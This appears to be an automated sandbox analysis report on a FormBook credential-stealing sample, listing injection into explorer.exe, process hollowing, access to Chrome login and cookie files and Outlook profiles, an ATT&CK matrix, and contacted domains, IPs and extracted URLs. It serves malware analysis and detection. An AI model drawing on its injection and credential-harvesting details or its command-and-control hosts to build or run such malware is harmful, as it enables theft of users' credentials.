        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_044851BE mov eax, dword ptr fs:[00000030h]8_2_044851BE
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_044851BE mov eax, dword ptr fs:[00000030h]8_2_044851BE
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_04409240 mov eax, dword ptr fs:[00000030h]8_2_04409240
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_04409240 mov eax, dword ptr fs:[00000030h]8_2_04409240
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_04409240 mov eax, dword ptr fs:[00000030h]8_2_04409240
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_04409240 mov eax, dword ptr fs:[00000030h]8_2_04409240
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_044CEA55 mov eax, dword ptr fs:[00000030h]8_2_044CEA55
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_04494257 mov eax, dword ptr fs:[00000030h]8_2_04494257
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_044BB260 mov eax, dword ptr fs:[00000030h]8_2_044BB260
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_044BB260 mov eax, dword ptr fs:[00000030h]8_2_044BB260
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_044D8A62 mov eax, dword ptr fs:[00000030h]8_2_044D8A62
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_0444927A mov eax, dword ptr fs:[00000030h]8_2_0444927A
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_04418A0A mov eax, dword ptr fs:[00000030h]8_2_04418A0A
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_04405210 mov eax, dword ptr fs:[00000030h]8_2_04405210
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_04405210 mov ecx, dword ptr fs:[00000030h]8_2_04405210
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_04405210 mov eax, dword ptr fs:[00000030h]8_2_04405210
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_04405210 mov eax, dword ptr fs:[00000030h]8_2_04405210
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_0440AA16 mov eax, dword ptr fs:[00000030h]8_2_0440AA16
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_0440AA16 mov eax, dword ptr fs:[00000030h]8_2_0440AA16
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_044CAA16 mov eax, dword ptr fs:[00000030h]8_2_044CAA16
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_044CAA16 mov eax, dword ptr fs:[00000030h]8_2_044CAA16
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_04423A1C mov eax, dword ptr fs:[00000030h]8_2_04423A1C
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_04444A2C mov eax, dword ptr fs:[00000030h]8_2_04444A2C
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_04444A2C mov eax, dword ptr fs:[00000030h]8_2_04444A2C
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_04432ACB mov eax, dword ptr fs:[00000030h]8_2_04432ACB
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_04432AE4 mov eax, dword ptr fs:[00000030h]8_2_04432AE4
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_0443D294 mov eax, dword ptr fs:[00000030h]8_2_0443D294
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_0443D294 mov eax, dword ptr fs:[00000030h]8_2_0443D294
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_044052A5 mov eax, dword ptr fs:[00000030h]8_2_044052A5
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_044052A5 mov eax, dword ptr fs:[00000030h]8_2_044052A5
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_044052A5 mov eax, dword ptr fs:[00000030h]8_2_044052A5
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_044052A5 mov eax, dword ptr fs:[00000030h]8_2_044052A5
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_044052A5 mov eax, dword ptr fs:[00000030h]8_2_044052A5
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_0441AAB0 mov eax, dword ptr fs:[00000030h]8_2_0441AAB0
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_0441AAB0 mov eax, dword ptr fs:[00000030h]8_2_0441AAB0
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_0443FAB0 mov eax, dword ptr fs:[00000030h]8_2_0443FAB0
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_0440DB40 mov eax, dword ptr fs:[00000030h]8_2_0440DB40
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_044D8B58 mov eax, dword ptr fs:[00000030h]8_2_044D8B58
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_0440F358 mov eax, dword ptr fs:[00000030h]8_2_0440F358
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_0440DB60 mov ecx, dword ptr fs:[00000030h]8_2_0440DB60
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_04433B7A mov eax, dword ptr fs:[00000030h]8_2_04433B7A
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_04433B7A mov eax, dword ptr fs:[00000030h]8_2_04433B7A
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_044C131B mov eax, dword ptr fs:[00000030h]8_2_044C131B
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_044853CA mov eax, dword ptr fs:[00000030h]8_2_044853CA
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_044853CA mov eax, dword ptr fs:[00000030h]8_2_044853CA
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_044303E2 mov eax, dword ptr fs:[00000030h]8_2_044303E2
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_044303E2 mov eax, dword ptr fs:[00000030h]8_2_044303E2
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_044303E2 mov eax, dword ptr fs:[00000030h]8_2_044303E2
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_044303E2 mov eax, dword ptr fs:[00000030h]8_2_044303E2
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_044303E2 mov eax, dword ptr fs:[00000030h]8_2_044303E2
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_044303E2 mov eax, dword ptr fs:[00000030h]8_2_044303E2
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_0442DBE9 mov eax, dword ptr fs:[00000030h]8_2_0442DBE9
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_044C138A mov eax, dword ptr fs:[00000030h]8_2_044C138A
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_044BD380 mov ecx, dword ptr fs:[00000030h]8_2_044BD380
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_04411B8F mov eax, dword ptr fs:[00000030h]8_2_04411B8F
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_04411B8F mov eax, dword ptr fs:[00000030h]8_2_04411B8F
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_0443B390 mov eax, dword ptr fs:[00000030h]8_2_0443B390
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_04432397 mov eax, dword ptr fs:[00000030h]8_2_04432397
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_044D5BA5 mov eax, dword ptr fs:[00000030h]8_2_044D5BA5
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_04434BAD mov eax, dword ptr fs:[00000030h]8_2_04434BAD
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_04434BAD mov eax, dword ptr fs:[00000030h]8_2_04434BAD
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_04434BAD mov eax, dword ptr fs:[00000030h]8_2_04434BAD
        Source: C:\Users\user\Desktop\zeuhAxTIRX.exe Process queried: DebugPort
        Source: C:\Windows\SysWOW64\rundll32.exe Process queried: DebugPort
        Source: C:\Users\user\Desktop\zeuhAxTIRX.exe Code function: 0_2_00E5CF33 LdrLoadDll, 0_2_00E5CF33

        HIPS / PFW / Operating System Protection Evasion

        Source: C:\Users\user\Desktop\zeuhAxTIRX.exe | Section unmapped: C:\Windows\SysWOW64\rundll32.exe base address: 140000
        Source: C:\Users\user\Desktop\zeuhAxTIRX.exe | Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
        Source: C:\Users\user\Desktop\zeuhAxTIRX.exe | Section loaded: unknown target: C:\Windows\SysWOW64\rundll32.exe protection: execute and read and write
        Source: C:\Users\user\Desktop\zeuhAxTIRX.exe | Section loaded: unknown target: C:\Windows\SysWOW64\rundll32.exe protection: execute and read and write
        Source: C:\Windows\SysWOW64\rundll32.exe | Section loaded: unknown target: C:\Windows\explorer.exe protection: read write
        Source: C:\Windows\SysWOW64\rundll32.exe | Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
        Source: C:\Users\user\Desktop\zeuhAxTIRX.exe | Thread APC queued: target process: C:\Windows\explorer.exe
        Source: C:\Users\user\Desktop\zeuhAxTIRX.exe | Thread register set: target process: 3528
        Source: C:\Windows\SysWOW64\rundll32.exe | Thread register set: target process: 3528
        Source: explorer.exe, 00000003.00000000.529239456.0000000000E50000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000003.00000002.830647796.0000000000E50000.00000002.00000001.00040000.00000000.sdmp | Binary or memory string: EProgram Managerzx
        Source: explorer.exe, 00000003.00000000.540271211.000000000834F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.529239456.0000000000E50000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000003.00000002.830647796.0000000000E50000.00000002.00000001.00040000.00000000.sdmp | Binary or memory string: Shell_TrayWnd
        Source: explorer.exe, 00000003.00000000.529239456.0000000000E50000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000003.00000002.830647796.0000000000E50000.00000002.00000001.00040000.00000000.sdmp | Binary or memory string: Progman
        Source: explorer.exe, 00000003.00000000.528807169.00000000009C8000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.830202814.00000000009C8000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Progmanath
        Source: explorer.exe, 00000003.00000000.529239456.0000000000E50000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000003.00000002.830647796.0000000000E50000.00000002.00000001.00040000.00000000.sdmp | Binary or memory string: Progmanlock

        Stealing of Sensitive Information

        Source: Yara match | File source: 0.2.zeuhAxTIRX.exe.e50000.1.unpack, type: UNPACKEDPE
        Source: Yara match | File source: 00000000.00000002.576146371.0000000000810000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
        Source: Yara match | File source: 00000008.00000002.830673789.00000000041A0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
        Source: Yara match | File source: 00000000.00000002.576828889.0000000000E51000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
        Source: Yara match | File source: 00000008.00000002.830559434.0000000002A50000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
        Source: Yara match | File source: 00000008.00000002.830024885.00000000002D0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
        Source: Yara match | File source: 00000000.00000002.576236738.0000000000840000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
        Source: C:\Windows\SysWOW64\rundll32.exe | Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\
        Source: C:\Windows\SysWOW64\rundll32.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cookies
        Source: C:\Windows\SysWOW64\rundll32.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
        Source: C:\Windows\SysWOW64\rundll32.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
        Source: C:\Windows\SysWOW64\rundll32.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Local State
        Source: C:\Windows\SysWOW64\rundll32.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local State
        Source: C:\Windows\SysWOW64\rundll32.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data

        Remote Access Functionality

        Source: Yara match | File source: 0.2.zeuhAxTIRX.exe.e50000.1.unpack, type: UNPACKEDPE
        Source: Yara match | File source: 00000000.00000002.576146371.0000000000810000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
        Source: Yara match | File source: 00000008.00000002.830673789.00000000041A0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
        Source: Yara match | File source: 00000000.00000002.576828889.0000000000E51000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
        Source: Yara match | File source: 00000008.00000002.830559434.0000000002A50000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
        Source: Yara match | File source: 00000008.00000002.830024885.00000000002D0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
        Source: Yara match | File source: 00000000.00000002.576236738.0000000000840000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
        Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Exfiltration | Command and Control | Network Effects | Remote Service Effects | Impact
        Valid Accounts | 1 Shared Modules | Path Interception | 52 Process Injection | 2 Virtualization/Sandbox Evasion | 1 OS Credential Dumping | 21 Security Software Discovery | Remote Services | 1 Email Collection | Exfiltration Over Other Network Medium | 1 Encrypted Channel | Eavesdrop on Insecure Network Communication | Remotely Track Device Without Authorization | Modify System Partition
        Default Accounts | Scheduled Task/Job | Boot or Logon Initialization Scripts | Boot or Logon Initialization Scripts | 52 Process Injection | LSASS Memory | 2 Virtualization/Sandbox Evasion | Remote Desktop Protocol | 1 Archive Collected Data | Exfiltration Over Bluetooth | 3 Ingress Tool Transfer | Exploit SS7 to Redirect Phone Calls/SMS | Remotely Wipe Data Without Authorization | Device Lockout
        Domain Accounts | At (Linux) | Logon Script (Windows) | Logon Script (Windows) | 1 Deobfuscate/Decode Files or Information | Security Account Manager | 2 Process Discovery | SMB/Windows Admin Shares | 1 Data from Local System | Automated Exfiltration | 4 Non-Application Layer Protocol | Exploit SS7 to Track Device Location | Obtain Device Cloud Backups | Delete Device Data
        Local Accounts | At (Windows) | Logon Script (Mac) | Logon Script (Mac) | 4 Obfuscated Files or Information | NTDS | 1 Application Window Discovery | Distributed Component Object Model | Input Capture | Scheduled Transfer | 14 Application Layer Protocol | SIM Card Swap | | Carrier Billing Fraud
        Cloud Accounts | Cron | Network Logon Script | Network Logon Script | 1 Rundll32 | LSA Secrets | 1 Remote System Discovery | SSH | Keylogging | Data Transfer Size Limits | Fallback Channels | Manipulate Device Communication | | Manipulate App Store Rankings or Ratings
        Replication Through Removable Media | Launchd | Rc.common | Rc.common | 3 Software Packing | Cached Domain Credentials | 1 File and Directory Discovery | VNC | GUI Input Capture | Exfiltration Over C2 Channel | Multiband Communication | Jamming or Denial of Service | | Abuse Accessibility Features
        External Remote Services | Scheduled Task | Startup Items | Startup Items | Compile After Delivery | DCSync | 2 System Information Discovery | Windows Remote Management | Web Portal Capture | Exfiltration Over Alternative Protocol | Commonly Used Port | Rogue Wi-Fi Access Points | | Data Encrypted for Impact
        Behavior Graph
        ID: 799425 | Sample: zeuhAxTIRX.exe | Startdate: 06/02/2023 | Architecture: WINDOWS | Score: 100

        Signatures on the analysis as a whole:
        • Snort IDS alert for network traffic
        • Malicious sample detected (through community Yara rule)
        • Antivirus detection for URL or domain
        • 4 other signatures

        zeuhAxTIRX.exe (started)
        • Modifies the context of a thread in another process (thread injection)
        • Maps a DLL or memory area into another process
        • Sample uses process hollowing technique
        • Queues an APC in another process (thread injection)

          explorer.exe (injected by zeuhAxTIRX.exe)
          • System process connects to network (likely due to code injection or exploit)
          • Performs DNS queries to domains with low reputation
          • DNS/IP: www.cmproutdoors.com 156.255.170.114, 49712, 49713, 80 XIAOZHIYUN1-AS-APICIDCNETWORKUS Seychelles
          • DNS/IP: parkhomenko-zinaida.ru 185.215.4.36, 49700, 49701, 80 TVHORADADAES Denmark
          • DNS/IP: 18 other IPs or domains

            rundll32.exe (started by explorer.exe)
            • Tries to steal Mail credentials (via file / registry access)
            • Tries to harvest and steal browser information (history, passwords, etc)
            • Modifies the context of a thread in another process (thread injection)
            • Maps a DLL or memory area into another process

            autoconv.exe (started by explorer.exe)

        Source | Detection | Scanner | Label | Link
        zeuhAxTIRX.exe | 56% | ReversingLabs | Win32.Trojan.FormBook |
        zeuhAxTIRX.exe | 54% | Virustotal | | Browse
        zeuhAxTIRX.exe | 100% | Avira | TR/Crypt.ZPACK.Gen |
        zeuhAxTIRX.exe | 100% | Joe Sandbox ML | |

        No Antivirus matches

        Source | Detection | Scanner | Label | Link | Download
        0.2.zeuhAxTIRX.exe.e50000.1.unpack | 100% | Avira | TR/Crypt.ZPACK.Gen | | Download File
        0.0.zeuhAxTIRX.exe.e50000.0.unpack | 100% | Avira | TR/Crypt.ZPACK.Gen | | Download File

        Source | Detection | Scanner | Label | Link
        www.lastmilerent.com | 1% | Virustotal | | Browse
                                                        • Avira URL Cloud: safe
                                                        unknown
                                                        https://cdnjs.cloudflare.com/ajax/libs/normalize/5.0.0/normalize.min.cssrundll32.exe, 00000008.00000002.831753356.000000000512E000.00000004.10000000.00040000.00000000.sdmpfalse
                                                          high
                                                          http://www.staciesellslka.com/wp-content/plugins/wp-zillow-review-slider/public/css/wprev-public_temrundll32.exe, 00000008.00000002.831753356.00000000052C0000.00000004.10000000.00040000.00000000.sdmpfalse
                                                          • Avira URL Cloud: safe
                                                          unknown
                                                          https://www.staciesellslka.com/properties/rundll32.exe, 00000008.00000002.831753356.00000000052C0000.00000004.10000000.00040000.00000000.sdmpfalse
                                                          • Avira URL Cloud: safe
                                                          unknown
                                                          https://www.piensasolutions.com?utm_source=parking&amp;utm_medium=link&amp;utm_campaign=piensarundll32.exe, 00000008.00000002.831753356.00000000055E4000.00000004.10000000.00040000.00000000.sdmpfalse
                                                            high
                                                            https://www.staciesellslka.com/lake-anna/rundll32.exe, 00000008.00000002.831753356.00000000052C0000.00000004.10000000.00040000.00000000.sdmpfalse
                                                            • Avira URL Cloud: safe
                                                            unknown
                                                            https://shop.piensasolutions.com/search-ajax.php?utm_source=parking&amp;utm_medium=link&amp;utm_camprundll32.exe, 00000008.00000002.831753356.00000000055E4000.00000004.10000000.00040000.00000000.sdmpfalse
                                                              high
                                                              http://www.autoitscript.com/autoit3/Jexplorer.exe, 00000003.00000000.539329346.0000000008260000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                high
                                                                https://search.yahoo.com?fr=mainrundll32.exe, 00000008.00000002.832505991.0000000006F50000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                  high
                                                                  https://www.staciesellslka.com/blog/rundll32.exe, 00000008.00000002.831753356.00000000052C0000.00000004.10000000.00040000.00000000.sdmpfalse
                                                                  • Avira URL Cloud: safe
                                                                  unknown
                                                                  https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=j-E8-1M.8.drfalse
                                                                    high
                                                                    https://www.netqwik.comrundll32.exe, 00000008.00000002.831753356.00000000052C0000.00000004.10000000.00040000.00000000.sdmpfalse
                                                                    • Avira URL Cloud: safe
                                                                    unknown
                                                                    https://www.staciesellslka.com/wp-content/uploads/2023/02/realtor-logo.fw_.pngrundll32.exe, 00000008.00000002.831753356.00000000052C0000.00000004.10000000.00040000.00000000.sdmpfalse
                                                                    • Avira URL Cloud: safe
                                                                    unknown
                                                                    https://www.staciesellslka.com/wp-content/uploads/fusion-gfonts/KFOmCnqEu92Fr1Mu4mxK.woff2rundll32.exe, 00000008.00000002.831753356.00000000052C0000.00000004.10000000.00040000.00000000.sdmpfalse
                                                                    • Avira URL Cloud: safe
                                                                    unknown
                                                                    https://piensasolutions.com/imgs/parking/icon-hosting.pngrundll32.exe, 00000008.00000002.831753356.00000000055E4000.00000004.10000000.00040000.00000000.sdmpfalse
                                                                      high
                                                                      https://search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas_sfp&command=rundll32.exe, 00000008.00000002.832505991.0000000006F50000.00000004.00000020.00020000.00000000.sdmp, j-E8-1M.8.drfalse
                                                                        high
                                                                        http://www.staciesellslka.com/wp-content/uploads/2023/02/logo-192.jpgrundll32.exe, 00000008.00000002.831753356.00000000052C0000.00000004.10000000.00040000.00000000.sdmpfalse
                                                                        • Avira URL Cloud: safe
                                                                        unknown
                                                                        https://www.piensasolutions.com/web-sencilla?utm_source=parking&amp;utm_medium=link&amp;utm_campaignrundll32.exe, 00000008.00000002.831753356.00000000055E4000.00000004.10000000.00040000.00000000.sdmpfalse
                                                                          high
                                                                          https://www.staciesellslka.com/wp-content/uploads/fusion-gfonts/dg4n_p3sv6gCJkwzT6RXiJwo.woff2rundll32.exe, 00000008.00000002.831753356.00000000052C0000.00000004.10000000.00040000.00000000.sdmpfalse
                                                                          • Avira URL Cloud: safe
                                                                          unknown
                                                                          http://www.staciesellslka.com/wp-content/uploads/2023/01/sc-logo-350.fw_.pngrundll32.exe, 00000008.00000002.831753356.00000000052C0000.00000004.10000000.00040000.00000000.sdmpfalse
                                                                          • Avira URL Cloud: safe
                                                                          unknown
                                                                          https://www.piensasolutions.com/hosting?utm_source=parking&amp;utm_medium=link&amp;utm_campaign=hostrundll32.exe, 00000008.00000002.831753356.00000000055E4000.00000004.10000000.00040000.00000000.sdmpfalse
                                                                            high
                                                                            https://cdnjs.cloudflare.com/ajax/libs/gsap/3.1.1/gsap.min.jsrundll32.exe, 00000008.00000002.831753356.000000000512E000.00000004.10000000.00040000.00000000.sdmpfalse
                                                                              high
                                                                              https://search.yahoo.com/searchrundll32.exe, 00000008.00000002.832505991.0000000006F50000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                high
                                                                                https://www.staciesellslka.com/about/rundll32.exe, 00000008.00000002.831753356.00000000052C0000.00000004.10000000.00040000.00000000.sdmpfalse
                                                                                • Avira URL Cloud: safe
                                                                                unknown
                                                                                http://ogp.me/ns#rundll32.exe, 00000008.00000002.831753356.00000000052C0000.00000004.10000000.00040000.00000000.sdmpfalse
                                                                                  high
                                                                                  https://piensasolutions.com/imgs/parking/icon-facebook-small.pngrundll32.exe, 00000008.00000002.831753356.00000000055E4000.00000004.10000000.00040000.00000000.sdmpfalse
                                                                                    high
                                                                                    https://www.staciesellslka.com/wp-content/uploads/fusion-icons/mechanic-icon-set/fonts/mechanic.ttf?rundll32.exe, 00000008.00000002.831753356.00000000052C0000.00000004.10000000.00040000.00000000.sdmpfalse
                                                                                    • Avira URL Cloud: safe
                                                                                    unknown
                                                                                    https://piensasolutions.com/imgs/parking/icon-twitter-small.pngrundll32.exe, 00000008.00000002.831753356.00000000055E4000.00000004.10000000.00040000.00000000.sdmpfalse
                                                                                      high
                                                                                      https://kestrel.idxhome.com/ihf-kestrel.js?ver=6.1.1rundll32.exe, 00000008.00000002.831753356.00000000052C0000.00000004.10000000.00040000.00000000.sdmpfalse
                                                                                        high
                                                                                        http://www.staciesellslka.com/wp-includes/css/classic-themes.min.css?ver=1rundll32.exe, 00000008.00000002.831753356.00000000052C0000.00000004.10000000.00040000.00000000.sdmpfalse
                                                                                        • Avira URL Cloud: safe
                                                                                        unknown
                                                                                        https://twitter.com/piensasolutionsrundll32.exe, 00000008.00000002.831753356.00000000055E4000.00000004.10000000.00040000.00000000.sdmpfalse
                                                                                          high
                                                                                          http://www.staciesellslka.com/wp-content/themes/Avada-Child-Theme/style.css?ver=6.1.1rundll32.exe, 00000008.00000002.831753356.00000000052C0000.00000004.10000000.00040000.00000000.sdmpfalse
                                                                                          • Avira URL Cloud: safe
                                                                                          unknown
                                                                                          http://www.staciesellslka.com/wp-includes/js/jquery/jquery.min.js?ver=3.6.1rundll32.exe, 00000008.00000002.831753356.00000000052C0000.00000004.10000000.00040000.00000000.sdmpfalse
                                                                                          • Avira URL Cloud: safe
                                                                                          unknown
                                                                                          http://survey-smiles.comrundll32.exe, 00000008.00000002.831753356.0000000004AE6000.00000004.10000000.00040000.00000000.sdmpfalse
                                                                                          • URL Reputation: safe
                                                                                          unknown
                                                                                          https://piensasolutions.com/imgs/parking/icon-web-sencilla.pngrundll32.exe, 00000008.00000002.831753356.00000000055E4000.00000004.10000000.00040000.00000000.sdmpfalse
                                                                                            high
                                                                                            https://piensasolutions.com/css/parking2.cssrundll32.exe, 00000008.00000002.831753356.00000000055E4000.00000004.10000000.00040000.00000000.sdmpfalse
                                                                                              high
                                                                                              https://cdnjs.cloudflare.com/ajax/libs/twitter-bootstrap/4.1.3/css/bootstrap.min.cssrundll32.exe, 00000008.00000002.831753356.000000000512E000.00000004.10000000.00040000.00000000.sdmpfalse
                                                                                                high
                                                                                                https://www.cmproutdoors.com/dhxt/?UlkAHnsI=Hdg1eSHwHIdp18MOehnfDNNUuCDltrvSJkToDZ2NoA5/soeDYsGvmU4grundll32.exe, 00000008.00000002.831753356.0000000005908000.00000004.10000000.00040000.00000000.sdmpfalse
                                                                                                • Avira URL Cloud: safe
                                                                                                unknown
                                                                                                https://search.yahoo.com?fr=crmas_sfpfj-E8-1M.8.drfalse
                                                                                                  high
                                                                                                  http://www.staciesellslka.com/wp-includes/css/dist/block-library/style.min.css?ver=6.1.1rundll32.exe, 00000008.00000002.831753356.00000000052C0000.00000004.10000000.00040000.00000000.sdmpfalse
                                                                                                  • Avira URL Cloud: safe
                                                                                                  unknown
                                                                                                  https://tilda.ccrundll32.exe, 00000008.00000002.831753356.0000000004F9C000.00000004.10000000.00040000.00000000.sdmpfalse
                                                                                                    high
                                                                                                    https://www.staciesellslka.com/feed/rundll32.exe, 00000008.00000002.831753356.00000000052C0000.00000004.10000000.00040000.00000000.sdmpfalse
                                                                                                    • Avira URL Cloud: safe
                                                                                                    unknown
                                                                                                    http://www.staciesellslka.com/wp-content/plugins/wp-zillow-review-slider/public/css/wprs_unslider-dorundll32.exe, 00000008.00000002.831753356.00000000052C0000.00000004.10000000.00040000.00000000.sdmpfalse
                                                                                                    • Avira URL Cloud: safe
                                                                                                    unknown
                                                                                                    http://www.staciesellslka.com/wp-content/uploads/2023/02/logo-250.fw_.pngrundll32.exe, 00000008.00000002.831753356.00000000052C0000.00000004.10000000.00040000.00000000.sdmpfalse
                                                                                                    • Avira URL Cloud: safe
                                                                                                    unknown
                                                                                                    http://www.staciesellslka.com/wp-content/uploads/2023/02/logo-64.jpgrundll32.exe, 00000008.00000002.831753356.00000000052C0000.00000004.10000000.00040000.00000000.sdmpfalse
                                                                                                    • Avira URL Cloud: safe
                                                                                                    unknown
                                                                                                    https://www.staciesellslka.com/xmlrpc.php?rsdrundll32.exe, 00000008.00000002.831753356.00000000052C0000.00000004.10000000.00040000.00000000.sdmpfalse
                                                                                                    • Avira URL Cloud: safe
                                                                                                    unknown
                                                                                                    https://www.staciesellslka.com/wp-admin/admin-ajax.phprundll32.exe, 00000008.00000002.831753356.00000000052C0000.00000004.10000000.00040000.00000000.sdmpfalse
                                                                                                    • Avira URL Cloud: safe
                                                                                                    unknown
                                                                                                    https://www.staciesellslka.com/open-home-search/rundll32.exe, 00000008.00000002.831753356.00000000052C0000.00000004.10000000.00040000.00000000.sdmpfalse
                                                                                                    • Avira URL Cloud: safe
                                                                                                    unknown
                                                                                                    http://www.staciesellslka.com/wp-content/plugins/wp-zillow-review-slider/public/js/wprev-public.js?vrundll32.exe, 00000008.00000002.831753356.00000000052C0000.00000004.10000000.00040000.00000000.sdmpfalse
                                                                                                    • Avira URL Cloud: safe
                                                                                                    unknown
                                                                                                    http://www.staciesellslka.com/wp-includes/wlwmanifest.xmlrundll32.exe, 00000008.00000002.831753356.00000000052C0000.00000004.10000000.00040000.00000000.sdmpfalse
                                                                                                    • Avira URL Cloud: safe
                                                                                                    unknown
                                                                                                    http://www.staciesellslka.com/wp-content/uploads/2023/02/logo-270.jpgrundll32.exe, 00000008.00000002.831753356.00000000052C0000.00000004.10000000.00040000.00000000.sdmpfalse
                                                                                                    • Avira URL Cloud: safe
                                                                                                    unknown
                                                                                                    https://www.piensasolutions.com/crear-web?utm_source=parking&amp;utm_medium=link&amp;utm_campaign=werundll32.exe, 00000008.00000002.831753356.00000000055E4000.00000004.10000000.00040000.00000000.sdmpfalse
                                                                                                      high
                                                                                                      https://www.staciesellslka.com/contact-me/rundll32.exe, 00000008.00000002.831753356.00000000052C0000.00000004.10000000.00040000.00000000.sdmpfalse
                                                                                                      • Avira URL Cloud: safe
                                                                                                      unknown
                                                                                                      http://www.staciesellslka.com/wp-content/plugins/wp-google-places-review-slider/public/js/wprev-publrundll32.exe, 00000008.00000002.831753356.00000000052C0000.00000004.10000000.00040000.00000000.sdmpfalse
                                                                                                      • Avira URL Cloud: safe
                                                                                                      unknown
                                                                                                      https://piensasolutions.com/imgs/parking/icon-ssl-parking.pngrundll32.exe, 00000008.00000002.831753356.00000000055E4000.00000004.10000000.00040000.00000000.sdmpfalse
                                                                                                        high
